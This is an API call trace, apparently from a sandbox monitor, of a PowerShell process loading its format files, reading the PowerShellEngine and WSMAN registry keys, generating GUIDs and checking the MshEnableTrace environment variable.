	[0786.462] CoTaskMemAlloc (cb=0x5a) returned 0x1b737290
	[0786.462] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737290, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0786.462] CoTaskMemFree (pv=0x1b737290) 
	[0786.463] RegCloseKey (hKey=0x328) returned 0x0
	[0786.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0786.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0787.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7a21f57e, Data2=0x6878, Data3=0x4c31, Data4=([0]=0x9e, [1]=0x28, [2]=0x27, [3]=0x87, [4]=0x31, [5]=0x48, [6]=0x96, [7]=0xab))) returned 0x0
	[0787.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x5d1d8d27, Data2=0xb4a9, Data3=0x40c2, Data4=([0]=0xb0, [1]=0xe5, [2]=0x97, [3]=0xe8, [4]=0xbb, [5]=0xdd, [6]=0x7e, [7]=0xdd))) returned 0x0
	[0787.459] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x39b1797b, Data2=0x9279, Data3=0x4f99, Data4=([0]=0x86, [1]=0x80, [2]=0x9b, [3]=0x8f, [4]=0xcb, [5]=0x24, [6]=0xdb, [7]=0x88))) returned 0x0
	[0787.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x4d07272, Data2=0x7e32, Data3=0x4c92, Data4=([0]=0xb2, [1]=0xea, [2]=0x7d, [3]=0x27, [4]=0xc0, [5]=0x80, [6]=0xe0, [7]=0x3a))) returned 0x0
	[0787.460] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x3d6e6d4a, Data2=0xfc34, Data3=0x4268, Data4=([0]=0x95, [1]=0xe0, [2]=0xad, [3]=0xa6, [4]=0x91, [5]=0x5b, [6]=0x84, [7]=0xe5))) returned 0x0
	[0787.461] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xd995537, Data2=0xd0fe, Data3=0x4c61, Data4=([0]=0xbb, [1]=0x87, [2]=0xd8, [3]=0x54, [4]=0xfa, [5]=0x8, [6]=0xf7, [7]=0xee))) returned 0x0
	[0787.461] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x799b600d, Data2=0x8606, Data3=0x4ea3, Data4=([0]=0x83, [1]=0x9e, [2]=0xf3, [3]=0x98, [4]=0x58, [5]=0x36, [6]=0x6a, [7]=0x1a))) returned 0x0
	[0787.461] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x1b893dd0, Data2=0x2754, Data3=0x469e, Data4=([0]=0xb3, [1]=0xf4, [2]=0x8b, [3]=0x83, [4]=0xd9, [5]=0x36, [6]=0x7e, [7]=0xd7))) returned 0x0
	[0787.462] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xa909d8af, Data2=0x4710, Data3=0x41b3, Data4=([0]=0x8a, [1]=0xb0, [2]=0x21, [3]=0x6b, [4]=0x36, [5]=0xfa, [6]=0x2a, [7]=0xcf))) returned 0x0
	[0787.462] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xae993153, Data2=0x4046, Data3=0x4332, Data4=([0]=0xbe, [1]=0x89, [2]=0x34, [3]=0x40, [4]=0x11, [5]=0x77, [6]=0x8c, [7]=0x9a))) returned 0x0
	[0787.462] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x55660479, Data2=0x2115, Data3=0x4aa5, Data4=([0]=0x9a, [1]=0x67, [2]=0xb4, [3]=0xc9, [4]=0xfb, [5]=0x18, [6]=0x9a, [7]=0x4e))) returned 0x0
	[0787.463] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x3b46875b, Data2=0x52c1, Data3=0x4c95, Data4=([0]=0x89, [1]=0x24, [2]=0xd5, [3]=0xd3, [4]=0x5a, [5]=0xa4, [6]=0xd4, [7]=0x56))) returned 0x0
	[0787.463] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc4e0c47a, Data2=0x62a0, Data3=0x4b24, Data4=([0]=0xaf, [1]=0x81, [2]=0xaa, [3]=0x7f, [4]=0xeb, [5]=0x13, [6]=0x37, [7]=0xc5))) returned 0x0
	[0787.463] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x57dcc2ec, Data2=0xeb35, Data3=0x4ee7, Data4=([0]=0xa4, [1]=0x9d, [2]=0x5e, [3]=0x30, [4]=0x54, [5]=0x5a, [6]=0xa1, [7]=0xa5))) returned 0x0
	[0787.463] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xe6d0ec8d, Data2=0x62fe, Data3=0x4333, Data4=([0]=0xbc, [1]=0xd, [2]=0x65, [3]=0x9, [4]=0x27, [5]=0xd4, [6]=0xda, [7]=0xf0))) returned 0x0
	[0787.464] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7d8b578e, Data2=0x891e, Data3=0x47fa, Data4=([0]=0x84, [1]=0x86, [2]=0xa6, [3]=0x3b, [4]=0x8d, [5]=0x1b, [6]=0x9e, [7]=0xbd))) returned 0x0
	[0787.464] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x27e264f, Data2=0x7978, Data3=0x4898, Data4=([0]=0xa5, [1]=0xbe, [2]=0x1d, [3]=0xfc, [4]=0x12, [5]=0x5c, [6]=0x9c, [7]=0xb5))) returned 0x0
	[0787.464] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xd5464388, Data2=0x19d0, Data3=0x4e94, Data4=([0]=0xb4, [1]=0x6d, [2]=0x8e, [3]=0x58, [4]=0x14, [5]=0x74, [6]=0xbb, [7]=0x35))) returned 0x0
	[0787.465] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xdf6cf0ae, Data2=0xbaee, Data3=0x4f1b, Data4=([0]=0x8c, [1]=0x78, [2]=0xc1, [3]=0x37, [4]=0x2e, [5]=0xf9, [6]=0x17, [7]=0x2b))) returned 0x0
	[0787.466] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xb0c2e45a, Data2=0xfcf, Data3=0x478a, Data4=([0]=0x9c, [1]=0x5f, [2]=0xd9, [3]=0xf1, [4]=0x76, [5]=0x34, [6]=0x75, [7]=0xa1))) returned 0x0
	[0787.466] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x851bde02, Data2=0xbfa7, Data3=0x4a21, Data4=([0]=0xb1, [1]=0x47, [2]=0x6d, [3]=0x5e, [4]=0x25, [5]=0x82, [6]=0x9b, [7]=0x67))) returned 0x0
	[0787.467] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc758bce9, Data2=0x5d4f, Data3=0x43d9, Data4=([0]=0xa2, [1]=0xe0, [2]=0x8f, [3]=0x21, [4]=0x18, [5]=0x63, [6]=0xba, [7]=0x82))) returned 0x0
	[0787.467] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xdff44291, Data2=0x9ff3, Data3=0x461d, Data4=([0]=0x99, [1]=0x46, [2]=0xa5, [3]=0x1e, [4]=0x68, [5]=0x54, [6]=0xb5, [7]=0x95))) returned 0x0
	[0787.467] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x41b05d56, Data2=0xcfc2, Data3=0x46cb, Data4=([0]=0x9c, [1]=0x35, [2]=0xd1, [3]=0x3f, [4]=0xc, [5]=0xea, [6]=0xaa, [7]=0x4d))) returned 0x0
	[0787.467] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xedf4028, Data2=0x9f9d, Data3=0x4e68, Data4=([0]=0x90, [1]=0x74, [2]=0x95, [3]=0x8f, [4]=0x5e, [5]=0xd0, [6]=0x5b, [7]=0x2c))) returned 0x0
	[0787.468] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x3aa2247f, Data2=0xf601, Data3=0x4b6b, Data4=([0]=0xac, [1]=0x63, [2]=0xec, [3]=0xb9, [4]=0x26, [5]=0x5e, [6]=0xad, [7]=0x3d))) returned 0x0
	[0787.468] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x335b033c, Data2=0x1873, Data3=0x45ec, Data4=([0]=0xa8, [1]=0x1c, [2]=0x75, [3]=0x94, [4]=0xa, [5]=0xac, [6]=0x1e, [7]=0x33))) returned 0x0
	[0787.468] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x11f8a390, Data2=0x27ce, Data3=0x4990, Data4=([0]=0x8f, [1]=0x7f, [2]=0x72, [3]=0x84, [4]=0x5b, [5]=0xe9, [6]=0x33, [7]=0xf1))) returned 0x0
	[0787.468] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x17da028, Data2=0x8f5c, Data3=0x4bd9, Data4=([0]=0x9d, [1]=0x80, [2]=0x2c, [3]=0xc5, [4]=0x3b, [5]=0x73, [6]=0xce, [7]=0x48))) returned 0x0
	[0787.469] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xe1a3684d, Data2=0x9adb, Data3=0x4447, Data4=([0]=0x82, [1]=0xa8, [2]=0x74, [3]=0xe2, [4]=0x9e, [5]=0x97, [6]=0x41, [7]=0x7c))) returned 0x0
	[0787.469] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xf9889ba8, Data2=0x2318, Data3=0x4827, Data4=([0]=0x93, [1]=0x4, [2]=0x76, [3]=0x3b, [4]=0x76, [5]=0xd, [6]=0x22, [7]=0x70))) returned 0x0
	[0787.469] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x4487870b, Data2=0x71a9, Data3=0x4c10, Data4=([0]=0x8f, [1]=0xd7, [2]=0x9e, [3]=0x6f, [4]=0x54, [5]=0xd0, [6]=0xb5, [7]=0x3))) returned 0x0
	[0787.470] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x6229955d, Data2=0xe3f2, Data3=0x4e54, Data4=([0]=0xb8, [1]=0x5b, [2]=0xd2, [3]=0xed, [4]=0x30, [5]=0xcd, [6]=0x87, [7]=0x50))) returned 0x0
	[0787.480] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x4cb870fc, Data2=0xe082, Data3=0x484e, Data4=([0]=0x93, [1]=0xa0, [2]=0x59, [3]=0xe5, [4]=0xc9, [5]=0x8f, [6]=0xe3, [7]=0xf9))) returned 0x0
	[0787.481] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x3a6055c7, Data2=0xe887, Data3=0x4f7b, Data4=([0]=0xb8, [1]=0x26, [2]=0x63, [3]=0xd, [4]=0x85, [5]=0xb7, [6]=0x5b, [7]=0x5f))) returned 0x0
	[0787.481] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xfbe2ca12, Data2=0x27b, Data3=0x44a2, Data4=([0]=0xab, [1]=0x79, [2]=0xac, [3]=0xb, [4]=0x8b, [5]=0xf2, [6]=0x3f, [7]=0xc1))) returned 0x0
	[0787.481] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x5fc320d5, Data2=0xb45, Data3=0x44d5, Data4=([0]=0x83, [1]=0xda, [2]=0xda, [3]=0x8b, [4]=0x72, [5]=0xed, [6]=0xdc, [7]=0x44))) returned 0x0
	[0788.606] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x5bdb4cdf, Data2=0xb51a, Data3=0x4c93, Data4=([0]=0x9d, [1]=0xed, [2]=0xac, [3]=0x29, [4]=0x46, [5]=0x5a, [6]=0xb6, [7]=0x87))) returned 0x0
	[0788.607] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xc8b03a62, Data2=0xf1d4, Data3=0x4d7b, Data4=([0]=0xbe, [1]=0x5e, [2]=0x1c, [3]=0xa2, [4]=0xed, [5]=0x61, [6]=0x8c, [7]=0x76))) returned 0x0
	[0788.607] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x50ec6ef0, Data2=0xa9e3, Data3=0x43e3, Data4=([0]=0xa9, [1]=0xa7, [2]=0xe4, [3]=0xca, [4]=0x8c, [5]=0x59, [6]=0x68, [7]=0x39))) returned 0x0
	[0788.607] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x5313d6c7, Data2=0xecec, Data3=0x4045, Data4=([0]=0xb8, [1]=0x11, [2]=0xe9, [3]=0xdd, [4]=0x4f, [5]=0x44, [6]=0xc5, [7]=0xc6))) returned 0x0
	[0788.607] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xfa2afa07, Data2=0xa5c7, Data3=0x4ef3, Data4=([0]=0x90, [1]=0x5f, [2]=0x75, [3]=0x59, [4]=0xef, [5]=0x49, [6]=0x7c, [7]=0xf9))) returned 0x0
	[0788.607] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x4c6cf73e, Data2=0x22a7, Data3=0x4240, Data4=([0]=0xb3, [1]=0x7c, [2]=0x42, [3]=0x91, [4]=0xaf, [5]=0x5c, [6]=0xb7, [7]=0x12))) returned 0x0
	[0788.607] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x616dfcbb, Data2=0xabdc, Data3=0x4baa, Data4=([0]=0xbd, [1]=0xfe, [2]=0xa7, [3]=0x9e, [4]=0x1, [5]=0x16, [6]=0xbd, [7]=0xf))) returned 0x0
	[0788.608] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x9f7d86c3, Data2=0x1266, Data3=0x47f1, Data4=([0]=0x9d, [1]=0xef, [2]=0xc7, [3]=0x9e, [4]=0xc3, [5]=0xb, [6]=0xc, [7]=0x42))) returned 0x0
	[0788.608] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x827dc432, Data2=0x3bee, Data3=0x4749, Data4=([0]=0xa4, [1]=0x25, [2]=0xe7, [3]=0x65, [4]=0x1b, [5]=0xf, [6]=0x30, [7]=0x9a))) returned 0x0
	[0788.608] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x6ea56698, Data2=0x9d0a, Data3=0x4855, Data4=([0]=0xb0, [1]=0xb7, [2]=0x5e, [3]=0xda, [4]=0x5c, [5]=0xa2, [6]=0xe1, [7]=0x53))) returned 0x0
	[0788.608] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x87ae4705, Data2=0x17fa, Data3=0x4ce7, Data4=([0]=0xb2, [1]=0x93, [2]=0x31, [3]=0x7c, [4]=0x58, [5]=0x29, [6]=0xb2, [7]=0x76))) returned 0x0
	[0788.608] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0788.608] GetFileType (hFile=0x328) returned 0x1
	[0788.609] SetErrorMode (uMode=0x1) returned 0x1
	[0788.609] GetFileType (hFile=0x328) returned 0x1
	[0788.609] ReadFile (in: hFile=0x328, lpBuffer=0x2d89e50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d89e50*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.610] ReadFile (in: hFile=0x328, lpBuffer=0x2d89e50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d89e50*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.610] ReadFile (in: hFile=0x328, lpBuffer=0x2d89e50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d89e50*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.610] ReadFile (in: hFile=0x328, lpBuffer=0x2d89e50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d89e50*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.610] ReadFile (in: hFile=0x328, lpBuffer=0x2d89e50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d89e50*, lpNumberOfBytesRead=0x16d3d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0788.610] ReadFile (in: hFile=0x328, lpBuffer=0x2d8926c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d8926c*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0788.611] ReadFile (in: hFile=0x328, lpBuffer=0x2d89e50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d89e50*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0788.611] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0788.611] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0788.611] CoTaskMemAlloc (cb=0x5a) returned 0x1b737290
	[0788.611] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737290, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0788.611] CoTaskMemFree (pv=0x1b737290) 
	[0788.611] RegCloseKey (hKey=0x328) returned 0x0
	[0788.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0788.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0788.612] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xa9cc229d, Data2=0xd076, Data3=0x4765, Data4=([0]=0x8a, [1]=0xaf, [2]=0x7d, [3]=0xa7, [4]=0x47, [5]=0xd0, [6]=0x1a, [7]=0xaa))) returned 0x0
	[0788.612] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x6cc51d3e, Data2=0x361e, Data3=0x4ca4, Data4=([0]=0x9d, [1]=0x8e, [2]=0xd1, [3]=0xd9, [4]=0x9b, [5]=0x1c, [6]=0xc4, [7]=0x91))) returned 0x0
	[0788.612] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0788.612] GetFileType (hFile=0x328) returned 0x1
	[0788.612] SetErrorMode (uMode=0x1) returned 0x1
	[0788.613] GetFileType (hFile=0x328) returned 0x1
	[0788.613] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7c38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.614] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7c38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.614] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7c38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.614] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7c38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0788.616] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7c38*, lpNumberOfBytesRead=0x16d3d8*=0xe98, lpOverlapped=0x0) returned 1
	[0788.616] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7238, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7238*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0788.617] ReadFile (in: hFile=0x328, lpBuffer=0x2dc7c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2dc7c38*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0788.617] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0788.617] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0788.617] CoTaskMemAlloc (cb=0x5a) returned 0x1b737290
	[0788.617] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737290, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0788.617] CoTaskMemFree (pv=0x1b737290) 
	[0788.617] RegCloseKey (hKey=0x328) returned 0x0
	[0788.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0788.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0788.618] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x8eba9c6d, Data2=0xc4a, Data3=0x44c7, Data4=([0]=0x83, [1]=0xf3, [2]=0xc2, [3]=0xf4, [4]=0xc4, [5]=0xfc, [6]=0x7a, [7]=0x87))) returned 0x0
	[0788.618] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x44c350c8, Data2=0xb3d, Data3=0x45a5, Data4=([0]=0xa7, [1]=0xab, [2]=0x95, [3]=0xfc, [4]=0xc6, [5]=0xb1, [6]=0x10, [7]=0xa4))) returned 0x0
	[0788.632] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.632] CoTaskMemFree (pv=0x1b742240) 
	[0788.632] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.633] CoTaskMemFree (pv=0x1b742240) 
	[0788.633] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.633] CoTaskMemFree (pv=0x1b742240) 
	[0788.633] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.634] CoTaskMemFree (pv=0x1b742240) 
	[0788.636] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.637] CoTaskMemFree (pv=0x1b742240) 
	[0788.637] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.638] CoTaskMemFree (pv=0x1b742240) 
	[0788.638] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0788.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.638] CoTaskMemFree (pv=0x1b742240) 
	[0789.551] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d678 | out: phkResult=0x16d678*=0x328) returned 0x0
	[0789.552] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d57c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d578*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0789.552] CoTaskMemFree (pv=0x0) 
	[0789.553] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0789.553] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x2e1ec0, lpcchValueName=0x16d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0789.553] CoTaskMemFree (pv=0x2e1ec0) 
	[0789.553] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
